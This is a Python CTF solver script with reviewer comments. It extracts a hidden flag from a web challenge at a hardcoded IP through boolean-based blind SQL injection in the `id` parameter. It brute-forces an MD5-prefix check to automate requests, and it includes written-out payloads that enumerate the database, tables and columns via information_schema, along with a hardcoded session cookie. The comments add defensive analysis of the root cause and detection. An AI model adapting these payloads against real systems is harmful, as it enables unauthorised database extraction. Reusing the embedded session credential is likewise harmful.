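def md5(str):
    """Return the hexadecimal MD5 digest of *str*.

    Accepts either a byte string or a text string; text is encoded as
    UTF-8 before hashing, because ``hashlib.md5`` rejects un-encoded text
    on Python 3. The result is used only to reproduce a short digest
    prefix, so MD5's lack of collision resistance does not matter here.
    Do not reuse this helper for integrity or password hashing.

    Args:
        str: The value to hash. The parameter name shadows the builtin
            and is kept only so existing callers keep working.

    Returns:
        The 32-character lowercase hex digest.
    """
    # The builtin ``str`` is shadowed by the parameter, so the type test
    # is expressed against the binary types instead.
    if isinstance(str, (bytes, bytearray, memoryview)):
        data = str
    else:
        data = str.encode("utf-8")
    return hashlib.md5(data).hexdigest()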
# Solver script for a CTF web challenge: it recovers a string one character
# at a time through a boolean condition placed in the `id` query parameter
# (boolean-based blind SQL injection). Python 2 syntax (`print res`).
#
# Reviewer notes (defensive reading of what the script relies on):
#   * Root cause: the payload only has an effect if the server builds its
#     SQL by concatenating `id` into the query -- inferred from the payload
#     shape, the server code is not shown. Binding `id` as a parameter, or
#     rejecting non-integer values, removes the injection.
#   * Oracle: the presence of 'welcome' in the response body tells the
#     client whether the injected condition was true.
#   * Anti-automation: the per-request `code` is matched on only 4 hex
#     characters of an MD5 digest (16 bits), so the loop below finds a
#     matching integer after roughly 65,000 hashes on average. It slows
#     a client down but does not stop automation.
#   * Detection: one session sends up to 95 requests per character
#     position, each with `ascii(substr(` in the query string (and
#     `information_schema` for the enumeration payloads). This is easy to
#     spot in access logs or WAF telemetry.
#   * The PHPSESSID below is a session credential published in source; a
#     session id exposed this way should be treated as compromised.
res = ''  # characters recovered so far
url = 'http://118.89.111.179:3000/'
cookie = {
    'PHPSESSID':'9jgb4e4s866rpfq3ivhg75r6fq'
}
for i in range(1000):  # i: character position passed to substr()
    for j in range(33,128):  # j: candidate ASCII code for that position
        # Fetch the page again to obtain the current challenge value.
        r = requests.get(url,cookies=cookie)
        # Bytes 35..38 of the body are compared with an MD5 hex prefix below;
        # presumably the page prints the expected prefix at that fixed offset
        # -- TODO confirm against the page markup.
        md5s = r.content[35:39]
        # print (md5s)
        code = 0  # stays 0 if no candidate below matches
        for x in range(10000000):
            # First integer whose MD5 hex digest starts with the 4 characters.
            if md5(str(x))[0:4] == md5s:
                code = x
                break
        url2 = 'http://118.89.111.179:3000/?code=%d&id=%s'
        # The short comments below look like the values recovered by earlier
        # runs with the commented-out payload that follows each of them
        # (inferred from their order; not verifiable from this file).
        # hgame
        # payload = "1 and (ascii(substr((select database()),%d,1))=%d)"%(i,j)
        # f1l1l1l1g,words
        # payload = "1 and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%d,1))=%d)"%(i,j)
        # f14444444g
        # payload = "1 and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='f1l1l1l1g'),%d,1))=%d)"%(i,j)
        payload = "1 and (ascii(substr((select f14444444g from f1l1l1l1g limit 0,1),%d,1))=%d)"%(i,j)
        url2 = url2%(code,payload)
        r = requests.get(url2,cookies=cookie)
        # A 'welcome' marker in the body is taken as "condition was true".
        if 'welcome' in r.content:
            res += chr(j)
            print res
            break